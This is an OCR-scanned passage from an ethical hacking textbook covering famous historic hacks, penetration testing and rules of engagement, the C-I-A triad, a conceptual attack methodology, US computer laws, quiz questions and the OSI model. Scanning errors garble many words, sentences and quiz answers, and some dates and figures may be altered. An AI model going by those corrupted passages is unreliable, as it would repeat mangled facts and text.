years, the hacking community has adapted a new team ethic or work style. In the past, it was normal for a ‘”lone wolf” type to engage in hacking activities. Over the last few years, there is a new pattern of collective or group effort. Attackers have found that working together can provide greater results than one individual carrying out an attack alone. Such teams increase their effectiveness not only by sheer numbers, diversity, or complementary skills, but also by adding clear leadership structures. Also of concern is the very real possibility that a given group of hackers may be receiving financing from nefarious sources such as criminal organizations or terrorists, The proliferation of technology and increasing dependence on it has proved an irresistible target for criminals. Security and technology professionals are on the front lines and as such must be aware of and deal with increasingly complex crimes. One of the biggest challenges security professionals face is staying current on the latest technologies, trends, and threats that appear in an ever-changing landscape. To be effective, security professionals must continually expand their understanding of many diverse but related areas such as ethical hacking, ethics, legal issues, cybercrime, forensic techniques, incident response, and other technologies. Additionally, security professionals must strive to understand the reEisons and motivations behind the hacker or criminal mindset Understanding the motivations can, in some cases, yield valuable insight into why a given attack has been committed or may be committed. CHAPTER 1 Hacking: The Next Generation 11 In the 1960s, Intel scientist Gordon Moore noted that the density of transistors was doubling every IS to 24 months. Since computing power is directly related to transistor density, the statement “computing power doubles every 18 months”‘ became known as Moore’s Law. Cybersecurity author and expert G. Mark Hardy has offered for security professionals a corollary known as G. Mark^ Law: “Half of what you know about security will be obsolete in 18 months.” Successful security professionals commit to lifelong learning. As stated earlier* hacking is by no means a new phenomenon; instead it has existed in one form or another since the 1960s. It is only for a portion of the time since then that hacking has been viewed as a crime and situation that must be addressed. Here’s a look at some famous hacks over time: In 1988, Cornell University student Robert T. Morris Jr. created what is considered to be the first internet worm. According to Morris, his worm was designed to count the number of systems connected to the Internet. Due to a design flaw, the worm replicated quickly and indiscriminately, causing widespread slowdowns across the globe. Morris was eventually convicted under the 1986 Computer Fraud and Abuse Act and was sentenced to community service in lieu of any jail time. (Interestingly, his father Robert Morris Sr.. was the chief scientist of the National Security Agency at the time). • In December 1999. David L. Smith created the Melissa virus, which was designed to e-mail itself to entries in a user s address book and later delete files on the infected system. Smith was convicted on charges of computer fraud and theft of services, and served 20 months in prison as well as being ordered to pay$ 5,000 in fines
and penalties for the damages he caused.

In February 200 1 , Jan de Wit authored the Anna Kournikova virus, which was
designed to read all the entries of a user’s Outlook address book and e-mail itself
out to each. De Wit was ultimately sentenced to 150 hours of community service
and 7 5 days in jail.

• In December 2004, Adam Botbyl and two friends conspired
to steal credit card information from the Lowe’s hardware
chain. The three were charged with several counts of theft
and fraud, but ultimately only Botbyl served any time,
• In September 2005, Cameron Lacroix (nickname “carnO” )
hacked into the phone of celebrity Paris Hilton and also
participated in an attack against the site LexisNexis,
an online public record aggregator ultimately exposing
thousands of personal records. Mr. Lacroix was charged
with computer fraud and was sentenced to 11 months
in a juvenile detention facility as a result of his actions.

• NOTE

People have written worms and
viruses over the years for any
number of reasons, Some reasons
for creating malicious code have
included curiosity, monetary gain,
ego, thrill seeking, desire for fame,
and revenge; and in a handful of
cases to impress, or get revenge
agaEnst, a former lover.

12

PART 1 Hacker Techniques and Tools

The previous examples represent some of the higher-profile incidents that have
occurred, but for every news item or story that makes it into the public consciousness,
many more never do. For every hacking incident that is made public, only a small
portion of perpetrators are caught, and an even smaller number ever gel prosecuted
for cybercrime. In any case, hacking is indeed a crime, and engaging in such activities
can he prosecuted under any number of laws. The volume, frequency, and seriousness
of attacks have only increased and will continue to do so as technology evolves even
more.

Ethical Hacking and Penetration Testing

As a security professional, two of the terms you will encounter early on are ethical hacker
and penetration testing. Today’s security community includes different schools of thought
on what constitutes each. It’s important to separate and clarify these two terms to
understand each and where they fit into the big picture.

Engaging in any hacking activity without the explicit permission of the owner of the target
you are attacking is a crime, whether tjon get caught or not. From everything discussed so
far, you might think that hacking is not something you can engage in legally or for any
benign reason whatsoever, but this is far from the truth. It is possible to engage in hacking

for good reasons (for example, when a network owner
contracts with a security professional to hack systems
to uncover vulnerabilities that should be addressed).
Notice the important phrases “network owner contracts”
and ” explicit permission”: Ethical hackers engage in their
activities only with the permission of the asset owner.

Once ethical hackers have the necessary permissions
and contracts in place, they can engage in penetration
testing, which is the structured and methodical means
of investigating, uncovering, atl ticking, and reporting
on a target system’s strengths and vulnerabilities. Under
the right circumstances, penetration testing can provide
a wealth of information that the system owner can use

Penetration testing can take the form of black -box or white-box testing, depending
on what is being evaluated and what the organization’s goals are. Black-box testing
Is in l “S1 often used v, Jien an organmilmn UTinls lo closely simulate how an tut acker
views a system, so no knowledge of the system is provided to the testing team.
In white-box testing, advanced knowledge is provided to the testing team. In either
case, an attack is simulated to determine what would happen to an organization
if an actual attack had occurred.

NOTE

In today’s environment, those
wishing to become ethical hackers
have many options that were
unavailable before. They can
pursue certification classes and
participate in boot camps as part
of a diverse development course to
hone their skills. Always remember
that the main characteristic that
separates black hats from white
hats is compliance with the law.

1

CHAPTER 1 Hacking: The Next Generation 13

Penetration tests are also commonly used as part of ei larger effort commonly known
as an IT audit, which evaluates the overall effectiveness of the IT systems controls that
safeguard the organization. An IT audit is usually conducted against some standard or
checklist that covers security protocols, software development, administrative policies,
and IT governance. However, passing an IT audit does not mean that the system is
completely secure, as audit checklists often trail new attack methods by months or years.

The Role of Ethical Hacking

An ethical hacker’s role is to take the skills he or she has acquired and use thai knowledge,
together with an understanding of the hacker mindset, to simulate a hostile attacker.
It often said that to properly and completely defend oneself against an aggressor, you must
understand how that aggressor thinks, acts, and reacts .The idea is similar to military
training exercises in which elite units are trained in the tactics of a hostile nation in order
lo give other units the ability to train and understand the enemy without risking lives.

Here a few key points about ethical hacking that are
important to the process:

It requires the explicit permission of the “victim”
before any activity can take place.

Participants use the same tactics and strategies
as regular hackers.

Tt can harm a system if you don’t exercise proper care.

It requires detailed advance knowledge of the actual
techniques a regular hacker will use.

It requires that rules of engagement or guidelines
be established prior to any testing.

NOTE

Ethical hackers can be employed
to test a specific feature of a
group of systems, or even trie
security of a whole organization.
It depends on the specific needs
of a given organization. In fact,
some organizations keep people
on staff specifically to engage
in ethical hacking activities.

TO

Under the right circumstances and with proper planning and goals, ethical hacking
or penetration testing can provide a wealth of valuable information to the target organi-
zation (“client”) about security issues that need addressing. The client should take these
results, prioritize them, and take appropriate action to improve security. Effective security
must still allow the system to provide the functionality and features needed for business
to continue. However, a client may choose not to take action for a variety of reasons.
In some cases, problems uncovered may be considered minor or low risk and left as is.
If the problems uncovered require action, the challenge is to ensure that if security
controls are modified or new ones put in place, existing usability is not decreased.
Security and convenience are often in conflict with one another — the more secure
a system becomes, the less convenient it tends to be (Figure 1-1). A great example of
this concept is to look at authentication mechanisms. As a system moves from passwords
to smart cards to biometrics, it becomes more secure — but at the same time users may
have to take longer to authenticEite. which may cause some dlsgruntlement.

14

PART 1 Hacker Techniques and Tools

Usability versus security,

Ease of Use

From the theoretical side, ethical hackers Eire tasked with evaluating the overall
state of something known as the C-I-A triad, which represents one of the core principles
of security: to preserve confidentiality, integrity, and availability;

• Confidentiality — Safeguarding information or services against disclosure
to unauthorized parties.

• Integrity — Ensuring that information is in its intended formal or state:
in other words, ensuring that data in not altered.

• Availability — Ensuring that information or a service can be accessed
or used whenever requested .

Some professionals refer to this as the A-I-C triad. Another way of looking at the balance
is to observe the other side of the triad and how the balance is lost. The C-I-A triad is lost
if any or all of the following occu rs:

• Disclosure — Information is accessed in some manner by an unauthorized party.
Alteration — Information is maliciously or accidentally modified in some manner.

• Disruption — Information and/or services are not accessible or usable when
called upon.

An ethical hacker is tasked with ensuring that the C-I-A triad is preserved and threats
are dealt with adequately (as required by the organization’s own rules], For example,
consider what could result if a hetiEth-care organization lost control of (or could not
in civil and criminal actions.

Figure 1-2 shows the C-I-A triad,

CHAPTER 1 Hacking: The Next Generation

It is important to identify assets, risks., vulnerabilities and threats. In the ethical
hacking and security process, not all assets are created equal and do not have equal value
for an organization. By definition, assets possess some value to a given organization.
Asset owners evaluate each asset U> del ermine how important it is relative to other assets
and to the company as a whole, Next, the ethical hacker identifies potential threats and
determines the capability of each to cause harm to the assets in question. Once assets and
potential threats are identified, the ethical hacker thoroughly and objectively evaluates
and documents each asset’s vulnerabilities in order to understand potential weaknesses.
Note that a vulnerability exists only It a particular threat can adversely affect an asset
Finally, the ethical hacker performs a risk determination for each asset individually and
overall to determine the probtibility that a security incident could occur, given the threats
and vulnerabilities in question. In a sense, risk is comparable to an individual’s “pain
threshold” — different individuals can tolerate different levels of pain. Risk is the same —
each organization has its own tolerance of risk, even if the threats and vulnerabilities
are the same.

A hacking methodology refers to the step-by-step approach an aggressor uses to attack
a target such as ei computer netw T ork. There is no one specific step-by-step approach all
hackers use. As can be expected when a group operates outside the rules as hackers do,
rules do not apply the same way, A major difference between a hacker and an ethical
hacker is the code of ethics to which each subscribes.

Hacking methodology generally includes the following steps (Figure 1-3):

■ Foot printing — An attEicker passively acquires information about the intended

victim’s systems. In this context, passive Information gathering means that no active
interaction occurs between the attEicker and the victim (for example, conducting
a whois query,)

Common Hacking Methodologies

Availability

16

PART 1 Hacker Techniques and Tools

FIGURE 1-3

hacking steps.

Footprint] ng
Scanning
Enumeration
System Hacking

Escalation of Privilege

Covering Tracks

Planting Backdoors

“i

• Scan ni n g — A n a I t a cker t a kes the in It ) r m a lion o bta i n t? d during t h e foo I pr in I i n g p h a s l 1
and uses it to actively acquire more detailed information about a victim . For example,
an attacker might conduct a ping sweep of all the victim’s known IP addresses

to see which machines respond,

Enumeration — An attacker extracts more-detailed and useful information from
a victim’s system. Results of this step can include a list of user names, groups,
applications, banner settings, auditing information, and other similar information,

• System hacking — An attacker actively attacks a system using a method the
attacker deems useful

Escalation of privilege — If this step is successful, an attacker obtains privileges
on a given system higher than should be permissible. Under the right conditions,
an attacker can use privilege escalation to move from a low-level account such as
a guest account all the way up to administrator or system -level access,

• Covering tracks — In most cases, an attacker tries to avoid detection, and so will cover
his or her tracks by purging information from the system to destroy evidence of a crime.

Planting backdoors — Depending on goals, an attacker may leave behind a backdoor
on the system for later use. Backdoors can be used to regain access, as well as allow
any number of different scenarios to take place, such as privilege escalations or
remotely controlling a system.

CHAPTER 1 Hacking: The Next Gen e ration

17

Performing a Penetration Test

A penetration test is the next logical step beyond ethical hacking. Although ethical
hacking sometimes occurs, without format rules of engagement, penetration testing does
require rules to be agreed upon in advance. If an ethical hacker chooses to perform
a penetration test without having certain parameters determined ahead of time, it
can lead to a wide range of unpleasant outcomes. For example, not having the ru les
established prior to engaging in a test could result in criminal or civil charges, depending
on the injured party and the attack involved. It is also entirely possible that without
clearly defined rules, an attack may result in shutting down systems or services and
completely stopping a company’s operations.

National Institute of Standards and Technology Publication 800-42 (NIST 800-42),
Guideline on Network Security Tenting, describes penetration testing as a four-step process,
as shown in Figure 1-4.

When the organization decides to carry out a penetration test, the ethical hacker
should post certain questions to establish goals. During this phase, the aim should
be to clearly determine why a penetration test and its associated tasks are necessary

These questions include the following:

• Why is a penetration test deemed necessary?

• What is the function or mission of the organization to be tested?

• What will be the limits or rules of engagement for the test?

• What data and services wilt the test include?

• Who is the data owner?

• What results are expected at the conclusion of the test?

• What will be done with the results when presented?

• What is the budget?

• What are the expected costs?

■ What resources will be made available?

• What actions will be allowed as part of the test?

• When will the tests be performed?

FIGURE 1-4

Ethical hacking steps.

Planning

Discovery

Attack

^ Reporting <4

18 PART 1 I Hacker Techniques and Tools

• Will insiders be notified?

• Will the test be performed as b I tick or white box?

• What conditions will determine the tesf s success?

• Who will be the emergency contacts?

Penetration testing can take several forms, The ethical hacker must decide, along
with the client, which tests Eire appropriate and will yield the results the clients seek.
Tests that can be part of a penetration test include the following:

• Insider attack — This is designed to simulate the actions that a disgruntled employee
or other individuals who have authorized access to a system may undertake.

• Outsider attack — This is designed to closely match an outside aggressor’s attack
against an organization.

• Stolen equipment attack — This is designed to attack an organization’s physical
security. Actions of this type include breaking into server rooms, bypassing locks,
and other similar activities.

• Social engineering attack — In this type of attack, the target is the human being,
not the technology itself. If skillfully done, the attacker can obtain information
or access that the attacker would not otherwise have. The attack exploits the
inherent trust and habit in human nature.

Once the organization and the ethical hacker have discussed each test, determined
its suitability, and evaluated its potential advantages and side effects, they can linalize
the planning and contracts and perform the testing (Figure 1-5).

When performing a penetration test, the team should generally include members
with different but complementary skills. When the rules of the test have been determined,
the team is selected based on the intended tests it will perform and goals it will address.
Expect a team to include diverse skill sets, including detailed knowledge of routers and
routing protocols. Additional skills that prove useful are those that deal with the operation
and configuration of firewalls and the operation of ID Sand IPS systems. Team members
should also share some skills, such as knowledge of networking. Transmission Control
Protocol/ Internet Protocol (TCP/IP), and similar technologies.

Reassessment
Assessment

FIGURE 1-5

Ethical hacking
test steps.

Post Assessment

CHAPTER 1 Hacking: The Next Generation

19

When employees are riot provided information about a pending or an in- progress test, they
are more likely to respond as if a real attack were occurring. This is an excellent way to check
if training results in changed behavior. For example, if employees do not challenge strangers
conducting a penetration test, they are unlikely to challenge a real intruder.

Another important aspect of the test is whether will
hove Einy knowledge that the test is being performed.
In some cases, having employees unaware of the test will
yield valuable insight into how they respond to incident(s).
This allows for evaluation of current training.

Frameworks for the penetration test may include K 1ST
800-42 and 800-5 3. The Operationally Critical Threat,
Asset, and Vulnerability Evaluation (OCTAVE), or the Open
Source Security Testing Methodology Manual (OSSTMM’Il
The OSSTMM is very popular because it is an open source,
peer-reviewed methodology for performing security tests
and metrics.

NOTE

NI5T Special Publication (SP) 800-53A,
Guide for Assessing Security Controls
in Federal information Systems and
Organizations, specifically requires
penetration testing and requires that
ethical hackers exploit vulnerabilities
and demonstrate the effectiveness
of in-place security controls.

The Role of the Law and Ethical Standards

When an ethical hacker engages in any hacking-related activity, it is absolutely essential
that he or she know all applicable laws or .seek assistance to determine what the laws may
be. Never forget that due to the nature of the Internet and computer crime, it is entirely
possihle for any given crime to stretch over several jurisdictions, potentially frustrating
any attempts to prosecute it. Additionally, prosecution can be stymied by the legal systems
in different countries in which a mix of religious, military, criminat, and civil laws exist
Successful prosecution requires knowledge of the legal system in question.

Ethical hackers should exercise proper care not to violate the rules of engagement,
because doing so can have repercussions. Once a client has determined what the goals
and limitations of a test will he and contracted with the ethical hacker, the ethical hacker
must carefully adhere to the guidelines. Remember two very important points when
considering breaking guidelines:

• Trust — The client is placing trust in the ethical hacker to use the proper discretion
when performing a lest. W an ethical hacker breaks this trust, it can leEid to the
questioning of other details, such as the results of the test.

• Legal implications — Breaking a limit placed upon a test may be sufficient cause
for a client to lake legal action against the ethical hacker,

PART 1 Hacker Techniques and Tools

The following is a summary of Ieiws. regulations, and directives that an ethical hacker
should have a basic knowledge of:

• 1973 U.S. Code of Fair Information Practices governs the maintenance and storage
of personal information by data systems such as health and credit bureaus.
• 1974 IIS. Privacy Act governs the handling of personal information hy the
IIS. government,

• 1984 U.S. Medical Computer Crime Act addresses illegally accessing or altering
medication data.

• 1986 (Amended in 1996) U.S. Computer Fraud and Abuse Act includes issues
such as altering, damaging, or destroying information in a federal computer
and trafficking in computer passwords if it affects interstate or foreign commerce

• 198 6 U.S. Electronic Communications Privacy Act prohibits eavesdropping

• or the interception of message contents without distinguishing between private
or public systems.

• 1994 U.S. Communications Assistance for Law Enforcement Act requires all
communications carriers to make wiretaps possible.
• 1996 U.S. Ke n n edy-K a sseh a u m Health Insurance and Portability Accountability
the issues of personal health care information privacy and health-plan portability
in the United States,

• 1996 U.S. National Information Infrastructure Protection Act — enacted in
October of 1996 as part of Public Law 104-294 — amended the Computer Fraud
and Abuse Act, which is codified in 18 II.S.C. § 1030. This act addresses the
protection of the confidentiality, integrity, and availability of data and systems.
This act is intended to encourage other countries to adopt a similar framework,
ill us creating a more uniform approach i> addressing computer crime in Liu-
existing global information infrastructure.

• 2002 Sarbanes-Oxley Act (SOX) is a corporate governance law that affects
public corporations’ financial reporting. Under SOX, corporations must certify
the accuracy and integrity of their financial reporting and accounting.

• 2002 Federal Information Security Management Act fFISMA) requires every
U.S. federal agency to create and implement an in tor mat ion security program

• to protect the information and information systems that agency uses. This act also
requires agencies to conduct annual reviews of their information security program
and submit results to the Office of Management and Budget (OMB),

CHAPTER 1 Hacking: The Next Gen e ration

CHAPTER SUMMARY

This chapter addressed ethical hacking and its value to the security professional.
Ethical hackers are Individuals who possess skills comparable to regular hackers,
but ethical hackers engage in their activities only with permission. Ethical hackers
attempt to use the same skills, mindset, and motivation as a hacker in order to
simulate an attack by an actual hacker while at the same time allowing for the test
to be more closely controlled and monitored. Kihicul 1 nickers are professionals who
work within the confines of a set of rules of engagement that are never exceeded
lest they llnd themselves facing potential legal action.

Conversely, regular hackers may not follow the same ethics and limitations of
ethical hackers. Regular hackers may work without ethical limitations, and the
results they can achieve are restricted only by the means, motives, and opportunities

Finally, hacking that is not performed under contract is considered illegal and
is treated as such. By its very nature, hacking activities can easily cross state
and national borders into multiple legal jurisdictions.

KEY CONCEPTS AND TERMS

Asset

Authentication
Block-box testing
Cracker

Denial of service (DoS)
Distributed denial of service

Ethical hacker

Trojan horse
Vulnerability
White-box testing!

Exploit
Hacker

(DDoS)
Dumpster diving

22

PART 1 Hacker Techniques and Tools

CHAPTER 1 ASSESSMENT

1 . Which of the following represents a valid
ethical hai kiiLiJ l us I melhodoloiiv.”

A. HI FA A

B, RFC 10K7
G OSSTMM
II TCSEC

1. It Is most Important to obtain

before beginning a penetration test.

I. A Maturity exposure in an operating system
or application software component is called
a .

1. The second step of the hacking process
Is ,
• When hackers talk about standards of behavior
and moral issues of right and wrong, what

• are they rdcrring u>:

A, Rules
11. Standards
G Laws
II Ethics

1. Hackers may justify their actions based on
which of the following;

A. All information should be free

be unlimited

C Writing viruses, malware, or other code

is not a crime
D. Any of the above

1. This Individual responsible for releasing what
is considered to be the first Interne! worm was:

A. Kevin Mltnick

B. Robert Morris, Jn

11 Kevin FouJsen

S. A liHukcr w illi compuUiLe-. skills and expertise
to Launch harmful attacks on computer networks
iiud uses 1 1 lose skills Illegally is best described
as a(n):

A. Disgruntled employee

B. Ethical hacker

C. White hat hacker
11 Black hat hacker

1. If a penetration test team does not have
anything more than a list of IF addresses
of the organization’s network, what type
of test are the penetration testers conducting?

A. Blind assessment

B. While box
G tlray box
II Black box

1. How is the practice of tricking employees into
revealing sensitive data about their computer
system or infrastructure best described?

A. Ethical hacking

B. Dictionary attack
G Trojan horse

11 Social engineering

CHAPTER

TCP/IP Review

YOU MUST POSSESS a number of skills to conduct a successful
and complete penetration test. Among the skills that are critical is an
understanding of Transmission Control Protocol/Internet Protocol (TCP/IP)
and Its components, Because the Internet and most major networks employ
the IP protocol, an understanding of the suite becomes necessary.

The IP protocol has become the most widely deployed and utilized networking
protocol because of the power and flexibility it offers. The IP protocol has been
used in larger deployments and more diverse environments than were ever
envisioned by the protocol designers. Although the IP protocol is flexible and
scalable, it was not designed to be secure.

Prior to any discussion of TCP/IP, it Is important to understand a model that
is commonly known as Open Systems Interconnection (OSI). The OS I reference
model was originally conceived as a mechanism for facilitating consistent
communication and interoperability between networked systems.

This chapter rakes a km at the ; jrdaTien:a; concepts, Lech no oq es. and
other items related to networking. Included in this chapter is a closer examination
of the TCP/IP networking protocol and its components. This look at the TCP/IP
protocol helps you perform tests later on and provides a valuable foundation
for understanding various security vulnerabilities and a; tacks.

Chapter 2 Topics

This chapter covers the following topics and concepts:

What the OSI reference model is

What the TCP/IP layers are

23

Chapter 2 Goals

When you complete this chapter, you will be able to:

• Summarize the OSI reference model and TCP/IP model
• Describe the OSI reference model

• Describe the TCP/IP layers

• List the primary protocols of TCP/IP, including IP, Internet Control Message
Protocol (ICMP), TCP, and User Datagram Protocol (UDP)

• Select programs found at the application layer of the TCP/IP model

• Describe TCP functions and the importance of flags as related to activities
such as scanning

• List reasons why UDP is harder to scan for than TCP

• Identify how ICMP is used and define common ICMP types and codes

• Review the role of IP and its role in networking

• Describe physical frame types

• Detail the components of Ethernet

• List the purpose and structure of Media Access Control (MAC) addresses

• State the operation of carrier sense multiple access/collision detection
(CSMA/CD)

• Compare and contrast mutable and routing protocols

• Describe link state routing protocols and their vulnerabilities

• Describe distance routing protocols and their vulnerabilities

• Describe the function of protocol analyzers (sniffers)

• Explain the components of a sniffer application

• List common TCP/IP attacks

• Define denial of service (DoS)

• List common distributed denial of service (DDoS) attacks

• Define a SYN flood

• Explain the function of a botnet

• CHAPTER 2 TCP/IP Review

25

Exploring the OSI Reference Model

This section explores the Open Systems Interconnection (OSI )
reference model. In 197a the Open Systems Interconnection
Committee was created with the goal of creating a new
communication .standard for networking. Based on a number
of proposals, the OSI reference model was developed and is still
used today. The OSI reference model is used mainly in today’s
networking environment a.s both a reference model and an
effective means of teaching distributed communication.

OST functions in a predictable and structured fashion
designed to ensure compatibility and reliability. If you examine
the OSI reference model, you quickly notice that it is made up
of seven complementary but distinctly different layers, each
tasked with carrying out a discrete group of operations. From
the top down, these seven layers are the application, presen-
tation, session, transport, network, data link, and physical layers. These layers are also
referred to by number (seven is the application layer, andoneisthe physical layer.) The OSI
reference model is also implemented in two areas: hardware and software. The bottom two
layers are implemented in hardware, and the top live are implemented through software.

The layers of the OSI reference model are shown in Figure 2- 1 ,

The OSI reference model is not a
law or rule; it is a recommendation
that manufacturers of hardware
and software can choose to
adhere to or not. Although there
is no penalty for not following
OSI r vendors risk introducing
compatibility problems if their
product deviates too far from
the model.

The Role of Protocols

In the world of networking, the term “protocol” is sometimes misused. Protocols Eire
a set of agreed-upon rules through which communication takes place. Protocols can
be thought of in the same way as rules for communicating in a given language — certain
words and phrases are understood to convey meaning such as “hello” and “goodbye. 1 ‘
Through the use of protocols, dissimilar systems can communicate quickly, easily, and
efficiently without any confusion. Ensuring that a standard is in place and every system

OSI Reference Model

Application
Presentation
Session
Transport
Network
Physical

FIGURE 2-1

OSI reference model

layers.

Media Access Control {MAC)

26

PA RT 1 H ac ke r Techn iq u cs a \ 1 d Too I s

or service uses it makes for almost guaranteed interoperability. For example, think of
the problems that would arise if the electrical outlets that home appliances are plugged
into were all different shapes and sizes. You could never be sure whether the product
would work,

Rules are established in the OSI reference model through specific orders and hierarchies,
best represented by the use of layers. Each of the seven layers performs a given purpose
by receiving data from the layer above or below it and then sending the results on to the
next appropriate layer after processing takes place. These, seven layers can also be thought
of as individual modules with manufacturers of hardware or software writing their
respective products with a specific layer or purpose in mind. .Such modularity allows for
much easier design and management of networking technologies for all parties involved.

NOTE

When you look at the inter action
between layers in the OSI reference
model, note that moving from
Layer 1 to Layer 7 shows more
“intelligence.” As you get closer to
Layer 7 and move further away from
Layer 1, the network components
have more “understanding™ of
the information being handled.

Layer 1: Physical Layer

At the bottom of the hierarchy of layers in the OS! reference
model is the physical layer, also known as Layer 1. This lowest
layer defines the electrical and mechanical requirements used
to transmit information to and from systems across a given
transmission medium (such as cable, fiber, or radio waves).
This physical layer deals only with electrical and mechanical
characteristics. Examining I he phy sical layer will reveal “‘how
much” and “how long” information is sent, but wilt not reveal
any unders landing of the information being transmitted.
Physical layer characteristics include the following:

• Voltage levels
• Data rates

• Maximum transmission distances

• Timing of voltage changes

• Topology or physical layout of the network

• The physical layer also dictates how the information is to he sent. For example,

it specifies digital or analog signaling methods, base or broadband, and synchronous

or asynchronous transmission.

Consider for a momeul the types of attacks that could occur at the physical layer,
particularly that of an individual getting direct access to transmission media. At the
physical layer, the potential for an attack exists in many forms, including someone
hardware, Additionally, an attacker accessing the physical layer can place devices on
the network that can then be used to capture and/or analyze network traffic. A security
engineer should remember these issues and take steps lo secure physical devices
and network media and, if possible, encrypt network traffic as needed to prevent
u n a u t h or ized d isc lo su re .

CHAPTER 2 TCP/IP Review

27

The media access control (MAC) address is also sometimes known as the physical address
of a system. This address is provided by hardware, typically in the network card itself, and
it is embedded into the hardware at the time of manufacture. In most cases, this address
will be unique, but as with most things in security, this isn’t guaranteed in all cases (as will
be investigated later on).

A MAC address is a 6- byte (48- bit) address used to uniquely identify each device on the
local network.

One step above the physical layer is Layer 2, also known as the data link layer. As the
in for niation moves up from the physical layer to the data link layer, tin- Lihilily to handle
layer adds the ability to provide the initial framing, formatting, and general organization
of data prior to handing it off to the physical layer for transmission. More important, the
data link layer includes two items that will he important later on: logical link control (LLC)
and media access control (MAC).

To understand the actions and activities that occur at the data link layer, one of the
structures that must be understood is a frame. A frame can be visualized as a container
that the data to be transmitted can be placed into for delivery. Through the use of framing,
which is set by the network itself, a standard format for sending and receiving data Is
established, allowing for mutual understanding of the data being handled. The sending
station packages the information into frames, and the receiving station unpacks the
information from the frames and moves it along to the next layer for further processing.

The frame is a vital structure because it dictates just how
a network works at a fundamental level. There are many
types of frames that can be discussed, but the most common
type of network and the frames that come with it is Ethernet.
Ethernet, also known as Institute of Electrical and Electronics
Engineers (IEEE) 802,3, is used by the majority of data
networks.

Another important function of the data link is flow control,
which is the mechanism that performs data management.
Flow control is responsible for ensuring that what is being
sent does not overwhelm or exceed the capabilities of a

en physical connection, if lUnv control ibd nol exist,
it might be possible under the right conditions to overwhelm
a connection with enough traffic to cause an attack similar
to a denial of service (DoS) attack.

NOTE

Frame types are specific to a
network and cannot be understood
by a different network type because
the frames would be incompatible.
Although Ethernet is the most
common type of network, other
common networks include Token
Ring (IEEE 802,5) and wireless
(IEEE 302.11), each with its
own unique and incompatible
frame type.

28

PART 1 Hacker Techniques and Tools

The data link layer has a mechanism known as the Address Resolution Protocol (ARP).

which is responsible for translating IP addresses to a previously unknown MAC address,
uSecitrily is not something that the II 1 protocol does well H and the ARP Is a great example,
This feature does not include any ability to authenticate the systems that use it.

Layer 3: Network Layer

Layer 3 (the network layer) is the entity that handles the logical
Eid dressing and routing of traffic. One of the most visible items
that appear at this layer is the well-known IP address present in
the IP protocol. IP addresses represent what is known as logical
software that are changed as needed or dictated by the network.
Logical addresses are used to route traffic as well as assist in
the division of a network into logical segments.

To get an idea of what a logical network looks like, take a
moment to review a network subdivided by different IP subnets,
zis shown in Rgure 2-2.
At the network layer, security needs to be considered because manipulation of
information can occur at this level.

NOTE

The network Jayer is the first
of the layers within OSI that
are implemented in software.
Starting at Layer 3 and moving
up to Layer 7, each layer is
now implemented withtn the
software being used, specifically
the operating system.

Layer 4: Transport Layer

Just above the network layer is the transport layer (Layer 4}. The transport layer provides
a valuable service In network communication: the ability to ensure that data is sent
completely and correctly through the use of error recovery and flow control techniques.
On the surface, the transport layer and its function might seem similar to the delta link layer
because it also ensures reliability of communication. Howei r er. the transport layer not only
guarantees the link between stations: it also guarantees the actual delivery of data.

CHAPTER 2 KfVIP Review

29

Connection Versus Connectionless

At the transport layer are the two protocols known as TCP and UDP; these protocols are
known as connection and connectionless respectively. Connect ion -oriented protocols operate by
acknowledging or confirming every connection requestor transmission, much like getting a return
receipt for a letter. Connectionless protocols are those that do not require an acknowledgement
and in Tact do not ask for nor get one. The difference between these two is the overhead that is
involved. Due to connection -oriented protocol’s need for acknowledgements, the overhead is more
and the performance is less, while connectionless is faster due to its lack of this requirement.

From a high-level perspective, the transport layer is responsible for communication
between host computers and verifying that both the sender and receiver are ready to initiate
the data transfer. The two most widely known protocols found at the transport layer are
Transmission Control Protocol (TCP) and User Datagram Protocol (UDP). TCP is connection-
oriented, whereas UDP is connectionless. TCP provides reliable communication through
the use of handshaking, acknowledgments, error detection, and session teardown. UDP
is a connectionless protocol that offers speed and low overhead as its primary advantage.

Layer 5: Session Layer

Above the transport layer is the session layer (Layer 5)i which is responsible for the creation,
termination, and management of a given connection. When a connection is required
between two points using I he TCP protocol, the session layer takes the responsibility for
making sure that creation and destruction of the connection occurs properly. Session layer
protocols include items such as Remote Procedure Calls (RPCs) and Structured Query
Language (SQL). ^^^^^^^^^^^^^^

Layer 6: Presentation Layer

At the presentation layer (Layer 6), data is put into a format that
programs residing at the application layer can understand. Prior
to arriving at Layer b> information is not in a format that appli-
cation layer programs will be able to process fully and therefore
must be put into a format that can be understood.

Specific examples of services that are present at the presentation
layer include gateway services. Gatew r ay services allow for sending

or transmission of data between different points that possess different characteristics that
would otherwise make them incompatible. The session layer also manages data compression
so that the actual number of bits that must be transmitted on the network can be reduced.

Other vital services at the presentation layer are encryption and decryption services.
From a security perspective, encryption is important because it provides the ability to keep
information confidential.

NOTE

Examples of these formats
include American Standard
Code for Information
Interchange (ASCII) and
Extended Binary Coded Decimal
Interchange Code (EBCDIC).

30

PARTI Hacker Techniques and Tools

Be sure that when thinking of the name “application layer,” you take care not to think of
software applications. Software applications are those items that a jser of a system interacts
with directly, such as e-mail applications and Web browsers. The application layer is the point
at which software applications access network services as needed. Think of the software
applications as a microwave oven in your home and the application layer as the electrical outlet
that the microwave plugs into to get power.

Layer 7: Application Layer

Clipping off I he OS I reft’ re nee model is the application layer (Layer 7) – The application
layer hosts several tip plication services that are used by applications and other services
running on the system. For example, Web browsers that would be classified as a user-level
explication run on a system and access the network by “plugging 1 * into the services at
this layer to use the network. This layer includes network mon itoring, management,
file sharing. RPC, and other services used by applications,

The application layer is one that most users are familiar with because it is the home
of e-mail programs, rile transfer protocol (FTP), Telnet, Web browsers, office productivity
suites, and many other applications, It is also the home of many malicious programs
such as viruses, worms, Trojan horse programs, and other malevolent applications.

The Role of Encapsulation

In the OS I framework, the concept of encapsulation is the process of “packaging” infor-
mation prior to transmitting it from one location to another. When transmitted across the
network, it moves down from the application layer to the physical layer and then through
the physical medium. As the delta moves from the Explication layer down, the information
is packaged and manipulated along the way until it becomes a collection of bits that race
down the wire to the receiving station, where the process is reversed as the data moves
back up the model.

Data

Application

Encapsulation,

UDP

UDP
Data

Transport

IP

IP Data

Internet

Frame

Frame Data

Frame
Footer

CHAPTER 2 TCP/IP Review

31

Application
Presentation

Session
Transport

Network

Physical

Application attacks, buffer overflows, exploit code,
malicious software, e,g,, viruses, worms, and Trojans

NetBIOS enumeration, clear text extraction,
and protocot attack

Session hijacking. SYN attacks, and password
attacks

Port scanning, DOS attacks, service enumeration
and flag manipulation

IP attacks, routing attacks, AfiP poisoning,
